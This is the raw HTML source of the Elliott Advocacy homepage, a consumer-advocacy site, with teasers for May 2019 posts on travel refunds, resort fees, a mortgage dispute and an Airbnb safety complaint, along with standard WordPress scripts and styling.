</svg> </body> </html>
0
<!doctype html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Elliott Advocacy - Here to help</title> <meta name="description" content="Here to help" /> <link rel="canonical" href="https://www.elliott.org/" /> <link rel="next" href="https://www.elliott.org/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Elliott" /> <meta property="og:description" content="A site that advocates for you." /> <meta property="og:url" content="https://www.elliott.org/" /> <meta property="og:site_name" content="Elliott Advocacy" /> <meta property="og:image" content="http://h42-elliottcom.s3.amazonaws.com/wp-content/uploads/20160228161626/elliott_shield_logo_low-res.png" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Here to help" /> <meta name="twitter:title" content="Elliott Advocacy - Here to help" /> <meta name="twitter:site" content="@elliottdotorg" /> <meta name="twitter:image" content="http://h42-elliottcom.s3.amazonaws.com/wp-content/uploads/20160228161626/elliott_shield_logo_low-res.png" /> <meta name="msvalidate.01" content="0E6B3FC47600B0C4F6A94F58F94BE6C6" /> <meta name="google-site-verification" content="nk7-bnGe6ucEbx9GN9_c3GnDC7l2XKXDc5PbRBJ-d14" /> <meta name="p:domain_verify" content="55f3335f3520a71a90355b0511acd3d3" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.elliott.org/#organization","name":"www.elliott.org","url":"https://www.elliott.org/","sameAs":["https://www.facebook.com/ChristopherJamesElliott","https://www.instagram.com/elliottdotorg/","https://www.linkedin.com/in/christopherelliott","https://www.youtube.com/user/elliottdotorg","https://www.pinterest.com/elliottdotorg","https://twitter.com/elliottdotorg"],"logo":{"@type":"ImageObject","@id":"https://www.elliott.org/#logo","url":"http://h42-elliottcom.s3.amazonaws.com/wp-content/uploads/20160228161626/elliott_shield_logo_low-res.png","caption":"www.elliott.org"},"image":{"@id":"https://www.elliott.org/#logo"}},{"@type":"WebSite","@id":"https://www.elliott.org/#website","url":"https://www.elliott.org/","name":"Elliott Advocacy","publisher":{"@id":"https://www.elliott.org/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.elliott.org/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.elliott.org/#webpage","url":"https://www.elliott.org/","inLanguage":"en-US","name":"Elliott Advocacy - Here to help","isPartOf":{"@id":"https://www.elliott.org/#website"},"about":{"@id":"https://www.elliott.org/#organization"},"description":"Here to help"}]}</script> <link rel='dns-prefetch' href='//www.elliott.org' /> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Elliott Advocacy &raquo; Feed" href="https://www.elliott.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="Elliott Advocacy &raquo; Comments Feed" href="https://www.elliott.org/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.elliott.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.elliott.org/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-polls-css' href='https://www.elliott.org/wp-content/plugins/wp-polls/polls-css.css?ver=2.75.2' type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 8px; line-height: 10px; height: 10px; background: #E6E6E6; border: 1px solid #c8c8c8; } </style> <link rel='stylesheet' id='elliott-style-css' href='https://www.elliott.org/wp-content/themes/elliott/style.css?ver=20190213' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-ui-css' href='https://www.elliott.org/wp-content/themes/elliott/css/jquery-ui-styles.css?ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/wp-a11y.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."}; /* ]]> */ </script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.elliott.org/wp-content/themes/elliott/js/elliott.js?ver=20190326'></script> <link rel='https://api.w.org/' href='https://www.elliott.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.elliott.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.elliott.org/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <meta name="norton-safeweb-site-verification" content="d5o5v4kilvgjamkdlqcwte2x5696w4abac5p0pd5zzimgnacra8e6lh31kx4-xh-itm7k8fxk9mmezs4r2w8mil9ufvhwywraid8s2-ykrxgm7otr4pg6miwtdm9lplr" /> <style>img.lazyload,img.lazyloading{ display: block; font-size:0px; height: 0px!important; max-height: 0px!important; background-color: #ffffff; background-image: url('http://www.elliott.org/wp-content/plugins/lazy-load-optimizer/assets/frontend/img/50x50-loader.gif'); background-repeat: no-repeat; background-position: 50% 50%; background-size: 30px; } @supports (--custom:property) { [style*='--aspect-ratio'].lazyload,[style*='--aspect-ratio'].lazyloading{ padding-bottom: calc(100%/var(--aspect-ratio)); }} img.lazyload, img.lazyloading { opacity: 1; } img.lazyload, img.lazyloaded { opacity: 1; ; } iframe.lazyload, iframe.lazyloading{ display: block; background-color: #ffffff; background-image: url('http://www.elliott.org/wp-content/plugins/lazy-load-optimizer/assets/frontend/img/50x50-loader.gif'); background-repeat: no-repeat; background-position: 50% 50%; background-size: 30px; } .wp-block-gallery.is-cropped .blocks-gallery-item img.lazyload{ height:auto; } .wp-block-image .aligncenter, .wp-block-image .alignleft, .wp-block-image .alignright, .wp-block-image.is-resized { display: block; max-width: 100%; } .wp-block-image .aligncenter>figcaption, .wp-block-image .alignleft>figcaption, .wp-block-image .alignright>figcaption, .wp-block-image.is-resized>figcaption { display: block; } .wp-block-image .aligncenter span{ margin: 0 auto; } figure.wp-block-image.alignwide, figure.wp-block-image.alignfull{ display:block; }</style><link rel="icon" href="https://www.elliott.org/wp-content/uploads/cropped-Screen-Shot-2017-10-01-at-7.08.08-AM-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.elliott.org/wp-content/uploads/cropped-Screen-Shot-2017-10-01-at-7.08.08-AM-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.elliott.org/wp-content/uploads/cropped-Screen-Shot-2017-10-01-at-7.08.08-AM-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.elliott.org/wp-content/uploads/cropped-Screen-Shot-2017-10-01-at-7.08.08-AM-270x270.png" /> </head> <body class="home blog hfeed"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header"> <div class="site-branding"> <h1 class="site-title"><a href="https://www.elliott.org/" rel="home">Elliott Advocacy</a></h1> <p class="site-description">Here to help</p> </div> <div id="header-search"> <div id="header-social"> <a href="https://www.facebook.com/ChristopherJamesElliott" target="_blank" title="Link to Facebook Profile"> <img src="/wp-content/themes/elliott/images/facebook.png"> </a> <a href="https://twitter.com/elliottdotorg" target="_blank" title="Link to Twitter Page"> <img src="/wp-content/themes/elliott/images/twitter.png"> </a> <a href="https://www.linkedin.com/in/christopherelliott/" target="_blank" title="Link to LinkedIn Page"> <img src="/wp-content/themes/elliott/images/linkedin.png"> </a> <a href="/feed/" target="_blank" title="Link to RSS Feed"> <img src="/wp-content/themes/elliott/images/rss.png"> </a> </div> <form class="form-search" role="search" method="get" action="https://www.elliott.org/"> <input type="text" placeholder="Search" class="input-medium appendedInputButton search-query" value="" name="s" /><button type="submit" class="search-submit btn">GO</button> </form> </div> <div id="header-action-buttons"> <a href="/support/" id="header-donate">Donate</a> </div> <nav id="site-navigation" class="main-navigation"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false">Expand Menu</button> <div class="menu-mainmenu-container"><ul id="primary-menu" class="menu"><li id="menu-item-78380" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-78380"><a href="https://www.elliott.org/" aria-current="page">Home</a></li> <li id="menu-item-26614" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26614"><a href="https://www.elliott.org/about/">About</a></li> <li id="menu-item-26647" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26647"><a href="https://www.elliott.org/company-contacts/">Company Contacts</a></li> <li id="menu-item-33189" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-33189"><a href="http://forum.elliott.org/">Forums</a></li> <li id="menu-item-26656" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26656"><a href="https://www.elliott.org/newsletter/">Newsletter</a></li> <li id="menu-item-82471" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-82471"><a href="https://www.elliott.org/help/">Help</a></li> <li id="menu-item-48168" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-48168"><a href="http://elliott.org/volunteer">Join Us</a></li> </ul></div> </nav> </header> <div id="content" class="site-content"> <div id="primary" class="content-area"> <aside class="widget-area sidebar-left"> <section id="custom_html-3" class="widget_text widget widget_custom_html"><h2 class="widget-title">ESCALATE YOUR CASE</h2><div class="textwidget custom-html-widget">As a public service, we post the names, numbers and email addresses of executives responsible for customer service at major companies. <br><br> <div id="search-companies"> <input type="text" id="search-companies-input" placeholder="Find Company" class="input-medium" value=""><button type="submit" class="search-submit btn">GO</button> </div></div></section><section id="custom_html-6" class="widget_text widget widget_custom_html"><h2 class="widget-title">Most Popular Companies</h2><div class="textwidget custom-html-widget"><ul id="most-popular-company-list"> <li><a href="/company-contacts/american-airlines/">American Airlines</a></li> <li><a href="/company-contacts/expedia/">Expedia</a></li> <li><a href="/company-contacts/facebook/">Facebook</a></li> <li><a href="/company-contacts/la-fitness/">LA Fitness</a></li> <li><a href="/company-contacts/home-depot/">Home Depot</a></li> </ul></div></section><section id="text-58" class="widget widget_text"><h2 class="widget-title">Recently Updated Companies</h2> <div class="textwidget"><ul id="recently-updated-company-list"><li><a href='/company-contacts/delta-auto-protect'>Delta Auto Protect</a></li><li><a href='/company-contacts/dsw'>DSW</a></li><li><a href='/company-contacts/alliant-credit-union'>Alliant Credit Union</a></li><li><a href='/company-contacts/nebraska-furniture-mart'>Nebraska Furniture Mart</a></li><li><a href='/company-contacts/agoda'>Agoda</a></li></ul> </div> </section><section id="text-45" class="widget widget_text"><h2 class="widget-title">Answers</h2> <div class="textwidget"> <div class='recent-post'> <a href='https://www.elliott.org/answers/united-airlines-flight-delay-compensation/'><img width="300" height="167" data-srcset="https://www.elliott.org/wp-content/uploads/What-does-an-Airline-owe-you-after-a-flight-delay-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/What-does-an-Airline-owe-you-after-a-flight-delay-768x427.jpg 768w, https://www.elliott.org/wp-content/uploads/What-does-an-Airline-owe-you-after-a-flight-delay.jpg 800w" data-src="https://www.elliott.org/wp-content/uploads/What-does-an-Airline-owe-you-after-a-flight-delay-300x167.jpg" class="attachment-medium size-medium wp-post-image lazyload" sizes="(max-width: 300px) 100vw, 300px" style="--aspect-ratio:1.7964071856287;" data-alt="What can you expect in flight delay compensation?" /></a> <h3><a href='https://www.elliott.org/answers/united-airlines-flight-delay-compensation/'>Can I get $ 10,000 for my United Airlines flight delay?</a></h3> <p>After a lengthy flight delay on United Airlines, Joseph Baloun made a huge compensation request. He calculated that United Airlines&hellip;</p> </div> <div class='recent-post'> <a href='https://www.elliott.org/answers/get-refund-bankrupt-airline/'><img width="300" height="167" data-srcset="https://www.elliott.org/wp-content/uploads/What-can-you-do-when-airline-goes-bankrupt-and-leaves-you-stranded-abroad-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/What-can-you-do-when-airline-goes-bankrupt-and-leaves-you-stranded-abroad-768x427.jpg 768w, https://www.elliott.org/wp-content/uploads/What-can-you-do-when-airline-goes-bankrupt-and-leaves-you-stranded-abroad.jpg 800w" data-src="https://www.elliott.org/wp-content/uploads/What-can-you-do-when-airline-goes-bankrupt-and-leaves-you-stranded-abroad-300x167.jpg" class="attachment-medium size-medium wp-post-image lazyload" sizes="(max-width: 300px) 100vw, 300px" style="--aspect-ratio:1.7964071856287;" data-alt="What can you do when an airline goes bankrupt and leaves you stranded abroad?" /></a> <h3><a href='https://www.elliott.org/answers/get-refund-bankrupt-airline/'>This is how to get a refund from a bankrupt airline</a></h3> <p>What can you do if your airline goes bankrupt and leaves you stranded in another country?For Kesleigh Eysie, that's not&hellip;</p> </div> <div class='recent-post'> <a href='https://www.elliott.org/answers/how-to-fix-your-own-consumer-problem/'><img width="300" height="167" data-srcset="https://www.elliott.org/wp-content/uploads/resolution-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/resolution-768x427.jpg 768w, https://www.elliott.org/wp-content/uploads/resolution.jpg 800w" data-src="https://www.elliott.org/wp-content/uploads/resolution-300x167.jpg" class="attachment-medium size-medium wp-post-image lazyload" sizes="(max-width: 300px) 100vw, 300px" style="--aspect-ratio:1.7964071856287;" data-alt="You can fix your own consumer problem." /></a> <h3><a href='https://www.elliott.org/answers/how-to-fix-your-own-consumer-problem/'>How to fix your own consumer problem</a></h3> <p>You can fix your own consumer problem. If you're having trouble with a product or service, there is a way&hellip;</p> </div> <div class='recent-post'> <a href='https://www.elliott.org/blog/free-airline-upgrade-tips/'><img width="300" height="167" data-srcset="https://www.elliott.org/wp-content/uploads/How-to-score-a-free-airline-upgrade-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/How-to-score-a-free-airline-upgrade-768x427.jpg 768w, https://www.elliott.org/wp-content/uploads/How-to-score-a-free-airline-upgrade.jpg 800w" data-src="https://www.elliott.org/wp-content/uploads/How-to-score-a-free-airline-upgrade-300x167.jpg" class="attachment-medium size-medium wp-post-image lazyload" sizes="(max-width: 300px) 100vw, 300px" style="--aspect-ratio:1.7964071856287;" data-alt="How to score a free airline upgrade" /></a> <h3><a href='https://www.elliott.org/blog/free-airline-upgrade-tips/'>Here&#8217;s how to score a free airline upgrade</a></h3> <p>Be honest – you stopped playing the airline upgrade game a long time ago. And for good reason. Airlines demanded&hellip;</p> </div> <div class='recent-post'> <a href='https://www.elliott.org/answers/how-to-refund-on-a-nonrefundable-airline-ticket/'><img width="300" height="200" data-srcset="https://www.elliott.org/wp-content/uploads/terminal-1-300x200.jpeg 300w, https://www.elliott.org/wp-content/uploads/terminal-1-768x512.jpeg 768w, https://www.elliott.org/wp-content/uploads/terminal-1.jpeg 800w" data-src="https://www.elliott.org/wp-content/uploads/terminal-1-300x200.jpeg" class="attachment-medium size-medium wp-post-image lazyload" sizes="(max-width: 300px) 100vw, 300px" style="--aspect-ratio:1.5;" data-alt="Refund on a nonrefundable ticket" /></a> <h3><a href='https://www.elliott.org/answers/how-to-refund-on-a-nonrefundable-airline-ticket/'>How to get a refund on a nonrefundable airline ticket</a></h3> <p>Yes, you can get a refund on a nonrefundable airline ticket. Your airline may claim you can't. Your travel agent&hellip;</p> </div> </div> </section> </aside> <main id="main" class="site-main"> <article id="post-83731" class="post-83731 post type-post status-publish format-standard has-post-thumbnail hentry category-blog tag-how-to-check-the-safety-of-your-airbnb-neighborhood tag-im-afraid-of-the-location-of-my-airbnb tag-im-scared-of-my-airbnbs-neighborhood tag-if-youre-frightened-of-your-airbnbs-neighborhood-can-you-leave"> <header class="entry-header"> <div class="story-category"></div><h2 class="entry-title"><a href="https://www.elliott.org/blog/airbnb-safe-frightening-neighborhood/" rel="bookmark">Is Airbnb safe? This guest found the truth &#8212; the hard way</a></h2> <div class="entry-meta"> <span class="byline"> By <span class="author vcard"><a class="url fn n" href="https://www.elliott.org/author/elliott/">Christopher Elliott</a></span></span><span class="posted-on"> | <time class="entry-date published" datetime="2019-05-16T09:00:46-04:00">May 16, 2019</time><time class="updated" datetime="2019-05-16T10:02:58-04:00">May 16, 2019</time></span> </div> </header> <div class="entry-content"> <a class="post-thumbnail" href="https://www.elliott.org/blog/airbnb-safe-frightening-neighborhood/" aria-hidden="true" tabindex="-1"> <img width="800" height="445" data-srcset="https://www.elliott.org/wp-content/uploads/How-safe-is-your-Airbnb-neighborhood.jpg 800w, https://www.elliott.org/wp-content/uploads/How-safe-is-your-Airbnb-neighborhood-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/How-safe-is-your-Airbnb-neighborhood-768x427.jpg 768w" data-src="https://www.elliott.org/wp-content/uploads/How-safe-is-your-Airbnb-neighborhood.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image lazyload" sizes="(max-width: 800px) 100vw, 800px" style="--aspect-ratio:1.7977528089888;" data-alt="Is Airbnb safe? This guest found the truth &#8212; the hard way" /> </a> <p>How safe is Airbnb? Before you answer, consider what happened to Krystal Scott, who rented what she thought was a charming three-bedroom home in Lafayette, La.&#8211; until she moved in and discovered some Airbnb safety problems. <a href="https://www.elliott.org/blog/airbnb-safe-frightening-neighborhood/#more-83731" class="more-link"><span class="more-link-box">Read more</span><span class="screen-reader-text"> &#8220;Is Airbnb safe? This guest found the truth &#8212; the hard way&#8221;</span></a></p> </div> <footer class="entry-footer"> </footer> </article> <article id="post-83721" class="post-83721 post type-post status-publish format-standard has-post-thumbnail hentry category-the-troubleshooter tag-viator-canceled-tour tag-where-is-my-viator-refund"> <header class="entry-header"> <div class="story-category"></div><h2 class="entry-title"><a href="https://www.elliott.org/the-troubleshooter/viator-canceled-tour-missing-refund/" rel="bookmark">Viator canceled the tour. I want my money back</a></h2> <div class="entry-meta"> <span class="byline"> By <span class="author vcard"><a class="url fn n" href="https://www.elliott.org/author/elliott/">Christopher Elliott</a></span></span><span class="posted-on"> | <time class="entry-date published" datetime="2019-05-15T09:10:22-04:00">May 15, 2019</time><time class="updated" datetime="2019-05-15T09:08:16-04:00">May 15, 2019</time></span> </div> </header> <div class="entry-content"> <a class="post-thumbnail" href="https://www.elliott.org/the-troubleshooter/viator-canceled-tour-missing-refund/" aria-hidden="true" tabindex="-1"> <img width="800" height="445" data-srcset="https://www.elliott.org/wp-content/uploads/Viator-canceled-the-tour-in-Honolulu.jpg 800w, https://www.elliott.org/wp-content/uploads/Viator-canceled-the-tour-in-Honolulu-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/Viator-canceled-the-tour-in-Honolulu-768x427.jpg 768w" data-src="https://www.elliott.org/wp-content/uploads/Viator-canceled-the-tour-in-Honolulu.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image lazyload" sizes="(max-width: 800px) 100vw, 800px" style="--aspect-ratio:1.7977528089888;" data-alt="Viator canceled the tour. I want my money back" /> </a> <p><em>After Viator canceled Char Fischer&#8217;s walking tour without notice, the company refuses to answer her calls &#8212; or issue a refund. What gives?</em> <a href="https://www.elliott.org/the-troubleshooter/viator-canceled-tour-missing-refund/#more-83721" class="more-link"><span class="more-link-box">Read more</span><span class="screen-reader-text"> &#8220;Viator canceled the tour. I want my money back&#8221;</span></a></p> </div> <footer class="entry-footer"> </footer> </article> <article id="post-83704" class="post-83704 post type-post status-publish format-standard has-post-thumbnail hentry category-blog tag-are-mandatory-travel-fees-out-of-control tag-how-can-you-avoid-ridiculous-travel-fees"> <header class="entry-header"> <div class="story-category"></div><h2 class="entry-title"><a href="https://www.elliott.org/blog/most-ridiculous-travel-fees/" rel="bookmark">Here they are: The most ridiculous travel fees</a></h2> <div class="entry-meta"> <span class="byline"> By <span class="author vcard"><a class="url fn n" href="https://www.elliott.org/author/elliott/">Christopher Elliott</a></span></span><span class="posted-on"> | <time class="entry-date published" datetime="2019-05-14T09:20:11-04:00">May 14, 2019</time><time class="updated" datetime="2019-05-14T09:19:28-04:00">May 14, 2019</time></span> </div> </header> <div class="entry-content"> <a class="post-thumbnail" href="https://www.elliott.org/blog/most-ridiculous-travel-fees/" aria-hidden="true" tabindex="-1"> <img width="800" height="445" data-srcset="https://www.elliott.org/wp-content/uploads/Ridiculous-Travel-fees-got-you-down.jpg 800w, https://www.elliott.org/wp-content/uploads/Ridiculous-Travel-fees-got-you-down-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/Ridiculous-Travel-fees-got-you-down-768x427.jpg 768w" data-src="https://www.elliott.org/wp-content/uploads/Ridiculous-Travel-fees-got-you-down.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image lazyload" sizes="(max-width: 800px) 100vw, 800px" style="--aspect-ratio:1.7977528089888;" data-alt="Here they are: The most ridiculous travel fees" /> </a> <p>Eric Hochstein found something unusual on his bill at the Gregory Hotel in New York City recently.</p> <p>No, it wasn&#8217;t the mandatory $35-per-day resort fee that covers local and domestic calls, a 24-hour fitness center and coffee and tea. And it wasn&#8217;t the $259-per-night room rate, which was below average for Manhattan. <a href="https://www.elliott.org/blog/most-ridiculous-travel-fees/#more-83704" class="more-link"><span class="more-link-box">Read more</span><span class="screen-reader-text"> &#8220;Here they are: The most ridiculous travel fees&#8221;</span></a></p> </div> <footer class="entry-footer"> </footer> </article> <article id="post-83706" class="post-83706 post type-post status-publish format-standard has-post-thumbnail hentry category-blog tag-why-did-freedom-mortgage-report-me-to-collections"> <header class="entry-header"> <div class="story-category"></div><h2 class="entry-title"><a href="https://www.elliott.org/blog/help-freedom-mortgage-problem/" rel="bookmark">Can you solve this Freedom Mortgage problem?</a></h2> <div class="entry-meta"> <span class="byline"> By <span class="author vcard"><a class="url fn n" href="https://www.elliott.org/author/elliott/">Christopher Elliott</a></span></span><span class="posted-on"> | <time class="entry-date published" datetime="2019-05-13T09:43:00-04:00">May 13, 2019</time><time class="updated" datetime="2019-05-13T10:34:32-04:00">May 13, 2019</time></span> </div> </header> <div class="entry-content"> <a class="post-thumbnail" href="https://www.elliott.org/blog/help-freedom-mortgage-problem/" aria-hidden="true" tabindex="-1"> <img width="800" height="445" data-srcset="https://www.elliott.org/wp-content/uploads/Is-there-any-way-out-of-this-Freedom-Mortgage-Problem.jpg 800w, https://www.elliott.org/wp-content/uploads/Is-there-any-way-out-of-this-Freedom-Mortgage-Problem-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/Is-there-any-way-out-of-this-Freedom-Mortgage-Problem-768x427.jpg 768w" data-src="https://www.elliott.org/wp-content/uploads/Is-there-any-way-out-of-this-Freedom-Mortgage-Problem.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image lazyload" sizes="(max-width: 800px) 100vw, 800px" style="--aspect-ratio:1.7977528089888;" data-alt="Can you solve this Freedom Mortgage problem?" /> </a> <p>Alan Mileski has a Freedom Mortgage problem that&#8217;s making him feel trapped in a maze of bureaucracy and scripted responses. The solution should be so simple, but weeks of trying have left him frustrated. Is there a way out? <a href="https://www.elliott.org/blog/help-freedom-mortgage-problem/#more-83706" class="more-link"><span class="more-link-box">Read more</span><span class="screen-reader-text"> &#8220;Can you solve this Freedom Mortgage problem?&#8221;</span></a></p> </div> <footer class="entry-footer"> </footer> </article> <article id="post-83666" class="post-83666 post type-post status-publish format-standard has-post-thumbnail hentry category-blog tag-a-disappointing-fishing-excursion-in-alaska tag-can-you-get-a-refund-for-a-disappointing-shore-excursion tag-can-you-win-a-credit-card-dispute-but-end-up-in-collections tag-credit-card-dispute-misuse tag-princess-cruises-refund-problem tag-salmon-fishing-fiasco-with-princess-cruises tag-should-princess-cruises-refund-his-shore-excursion tag-what-can-you-do-after-an-unpleasant-shore-excursion tag-what-if-you-dont-like-your-cruise-excursion"> <header class="entry-header"> <div class="story-category"></div><h2 class="entry-title"><a href="https://www.elliott.org/blog/hated-shore-excursion-chargeback-mistake/" rel="bookmark">He hated the shore excursion, but what he did next was a mistake</a></h2> <div class="entry-meta"> <span class="byline"> By <span class="author vcard"><a class="url fn n" href="https://www.elliott.org/author/michelle-friedman/">Michelle Couch-Friedman</a></span></span><span class="posted-on"> | <time class="entry-date published" datetime="2019-05-11T19:00:43-04:00">May 11, 2019</time><time class="updated" datetime="2019-05-11T19:04:59-04:00">May 11, 2019</time></span> </div> </header> <div class="entry-content"> <a class="post-thumbnail" href="https://www.elliott.org/blog/hated-shore-excursion-chargeback-mistake/" aria-hidden="true" tabindex="-1"> <img width="800" height="445" data-srcset="https://www.elliott.org/wp-content/uploads/Hate-your-shore-excursion-can-you-get-a-refund.jpg 800w, https://www.elliott.org/wp-content/uploads/Hate-your-shore-excursion-can-you-get-a-refund-300x167.jpg 300w, https://www.elliott.org/wp-content/uploads/Hate-your-shore-excursion-can-you-get-a-refund-768x427.jpg 768w" data-src="https://www.elliott.org/wp-content/uploads/Hate-your-shore-excursion-can-you-get-a-refund.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image lazyload" sizes="(max-width: 800px) 100vw, 800px" style="--aspect-ratio:1.7977528089888;" data-alt="He hated the shore excursion, but what he did next was a mistake" /> </a> <p>If you hate your shore excursion, should the cruise line refund the money you spent on it? Joseph Campo believes so. After Princess Cruises refused a refund request for his disappointing salmon-fishing excursion in Alaska, he disputed the $520 charge. And when his credit card company told him that he won the chargeback, Campo assumed that settled the matter.</p> <p>It didn’t. Not even close. <a href="https://www.elliott.org/blog/hated-shore-excursion-chargeback-mistake/#more-83666" class="more-link"><span class="more-link-box">Read more</span><span class="screen-reader-text"> &#8220;He hated the shore excursion, but what he did next was a mistake&#8221;</span></a></p> </div> <footer class="entry-footer"> </footer> </article> <nav class="navigation posts-navigation" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://www.elliott.org/page/2/">Older posts</a></div></div> </nav> </main> <aside class="widget-area sidebar-right"> <section id="text-56" class="widget widget_text"><h2 class="widget-title">WHAT&#8217;S YOUR PROBLEM?</h2> <div class="textwidget"><p><a href="https://www.elliott.org/about-elliott-consumer-advocacy/">Elliott Advocacy</a> is a nonprofit organization that offers free advice and advocacy for consumers. If you need help with <em>any</em> problem, please <a href="https://www.elliott.org/help">contact us through this form</a>. You can also post your question on our <a href="http://forum.elliott.org">public help forum</a>. We&#8217;re here to help.</p> <p><a class="get-help-button" href="/help/">Get Help</a></p> </div> </section><section id="text-57" class="widget widget_text"><h2 class="widget-title">SUPPORT THIS SITE</h2> <div class="textwidget"><p>If you’ve benefitted from the advice, advocacy, or executive contacts on this site, please consider supporting us. You can <a href="http://elliott.org/support/">become an underwriter</a> today and join our cause or <a href="https://www.elliott.org/volunteer">volunteer to help advocate cases</a>.<br /> <a class="donate-button" href="/support/">Donate</a></p> </div> </section><section id="text-66" class="widget widget_text"><h2 class="widget-title">Recent Forum 